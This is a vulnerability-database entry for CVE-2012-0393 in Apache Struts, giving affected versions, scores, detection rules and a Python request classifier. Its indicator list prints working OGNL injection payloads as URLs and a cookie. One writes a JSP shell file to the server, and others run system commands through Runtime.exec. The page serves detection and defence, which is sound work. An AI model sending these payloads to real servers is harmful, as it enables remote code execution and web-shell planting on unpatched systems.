CVE-2012-0393
published 2012-01-08


Priority: P258, medium, 6.4 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:P
EXPLOIT
EPSS: 38.26% (98.4th percentile)
The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.

Affected

1 range
Vendor  Product  Version range       Fixed in
apache  struts   >= 2.1.0 < 2.3.1.1  2.3.1.1

Detection & IOCs (extracted from sources)

url: /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'
url: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
url: /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
path: C:/wwwroot/sec-consult.jsp
  • Detect OGNL injection attempts in HTTP parameter names or values containing '#_memberAccess["allowStaticMethodAccess"]' — a key bypass string used to enable static method access in XWork's SecurityMemberAccess.
  • Detect HTTP requests to Struts action URLs containing 'debug=command&expression=' in the query string, which invokes the DebuggingInterceptor to evaluate arbitrary OGNL expressions.
  • Detect Cookie headers containing OGNL expressions with '\u003d' (unicode-escaped '=') combined with '@java.lang.Runtime@getRuntime().exec', indicating exploitation via the CookieInterceptor.
  • Detect parameter names or values containing 'new+java.io.FileWriter' or 'new+java.io.BufferedWriter' in HTTP requests to Struts action endpoints, indicating arbitrary file write exploitation via ParameterInterceptor.
  • The bypass requires that the application is running in developer mode OR that the CookieInterceptor/ParametersInterceptor is not restricted to the hardened acceptedParamNames pattern. Exploitation via the Cookie vector (vuln 2) and DebuggingInterceptor (vuln 3) requires developer mode to be enabled.
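
The four detection bullets above, combined into one request classifier and checked against this page's own indicators. This is an added example, not code from the page's sources: the function `match_rules` and the rule names are assumptions, the positive samples are the indicator strings listed above, and the benign request is constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, unquote_plus, urlsplit

MEMBER_ACCESS = '#_memberAccess["allowStaticMethodAccess"]'
RUNTIME_EXEC = "@java.lang.Runtime@getRuntime().exec"
FILE_WRITE = re.compile(r"new\s+java\.io\.(?:FileWriter|BufferedWriter)")


def match_rules(target, cookie=""):
    """Return the sorted rule names that fire for a request target and Cookie header."""
    hits = set()
    query = urlsplit(target).query
    # Decode before matching: on the wire the indicators appear as
    # %23_memberAccess and new+java.io.FileWriter, not as the literal strings.
    decoded = unquote_plus(query)
    if MEMBER_ACCESS in decoded:
        hits.add("ognl-member-access")
    if FILE_WRITE.search(decoded):
        hits.add("ognl-file-write")
    # DebuggingInterceptor vector: debug=command together with an expression parameter.
    params = dict(parse_qsl(query, keep_blank_values=True))
    if params.get("debug") == "command" and "expression" in params:
        hits.add("debug-expression")
    # CookieInterceptor vector: unicode-escaped '=' combined with Runtime.exec.
    cookie = unquote(cookie)
    if "\\u003d" in cookie.lower() and RUNTIME_EXEC in cookie:
        hits.add("cookie-ognl")
    return sorted(hits)


# Positive samples are the indicator strings listed on this page.
FILE_WRITE_URL = r"""/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'"""
STATIC_URL = r"""/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'"""
DEBUG_URL = r"""/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')"""
COOKIE = r"""(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1"""
# Constructed benign request, used to check for false positives.
BENIGN_URL = "/Test.action?id=42&debug=false"
BENIGN_COOKIE = "JSESSIONID=0123456789abcdef"

if __name__ == "__main__":
    for target, cookie in [(FILE_WRITE_URL, ""), (STATIC_URL, ""), (DEBUG_URL, ""),
                           ("/Test.action", COOKIE), (BENIGN_URL, BENIGN_COOKIE)]:
        print(match_rules(target, cookie), target[:40])
```
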

CVSS provenance

nvd            v2.0  6.4  MEDIUM  AV:N/AC:L/Au:N/C:N/I:P/A:P
vendor_redhat        6.4  MEDIUM